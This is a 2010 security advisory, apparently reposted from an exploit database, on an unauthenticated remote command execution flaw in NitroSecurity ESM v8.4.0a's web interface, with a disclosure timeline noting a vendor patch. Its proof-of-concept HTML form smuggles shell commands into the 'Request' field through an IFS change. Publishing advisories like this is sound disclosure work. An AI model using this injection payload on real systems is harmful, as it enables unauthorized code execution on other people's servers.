Home / os / win7

[remote exploits] - NitroSecurity ESM v8.4.0a Remote Code Ex

Posted on 26 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>NitroSecurity ESM v8.4.0a Remote Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='NitroSecurity ESM v8.4.0a Remote Code Execution by Filip Palian in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================== NitroSecurity ESM v8.4.0a Remote Code Execution =============================================== -- Product description: NitroView ESM is an enterprise-class security information and event management system that identifies, correlates, and remediates threats faster than any other SIEM on the market. -- Problem Description: During research it was found that perl module &quot;ess.pm&quot; is prone to remote code execution vulnerability due to lack of user input validation. -- Research Environment: The vulnerability was found and tested on ESM 8.4.0a (NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux). -- Requirements: During the research &quot;ESSPMDebug=1&quot; option in &quot;/usr/local/ess/CPConsoleServer.cfg&quot; was required. No authentication in NitroSecurity ESM was required to successfuly conduct the attack. -- Technical Details: Because of the &quot;system()&quot; call in &quot;ess.pm&quot; module it&#039;s possible to send specially crafted request to NitroSecurity ESM web interface, which results in remote command execution. It&#039;s necessery to change IFS (Internal Field Separator) to exploit this vulnerability. Probably other methods also would work. -- Proof Of Concept: The following code was successfuly executed in testing environment (remember to change x.x.x.x to your NitroSecurity ESM IP address for testing purposes only): -- cut -- &lt;html&gt; &lt;pre&gt; [*] Tested on v8.4.0a &quot;NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux&quot; [*] No authentication required [*] &quot;ESSPMDebug=1&quot; in &quot;/usr/local/ess/CPConsoleServer.cfg&quot; required &lt;/pre&gt; &lt;form action=&quot;https://x.x.x.x/ess&quot;; method=&quot;POST&quot;&gt; &lt;input type=&quot;text&quot; name=&quot;Request&quot; value=&quot;A&#039;;c=&#039;uname:-a&#039;;IFS=:;$c&gt;&gt;/tmp/test;&#039;&quot; &lt;input type=&quot;hidden&quot; name=&quot;debug&quot; value=&quot;1&quot;&gt; &lt;input type=&quot;submit&quot; value=&quot;Oops()&quot;&gt; &lt;/form&gt; &lt;/html&gt; -- cut -- -- Impact: Remote code execution in the context of the user running web server. -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Disclosure timeline: 20100922: initial contact with vendor 20100922: vendor response 20100923: detailed information about vulnerability and PoC sent to vendor 20100923: vulnerability confirmed by vendor 20101008: patch released by vendor 20101025: security advisory released -- Credits: This bug was found by s_n ;-p -- Greetz K&amp;I, #dragonfly # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-26]</pre></body></html>

 

TOP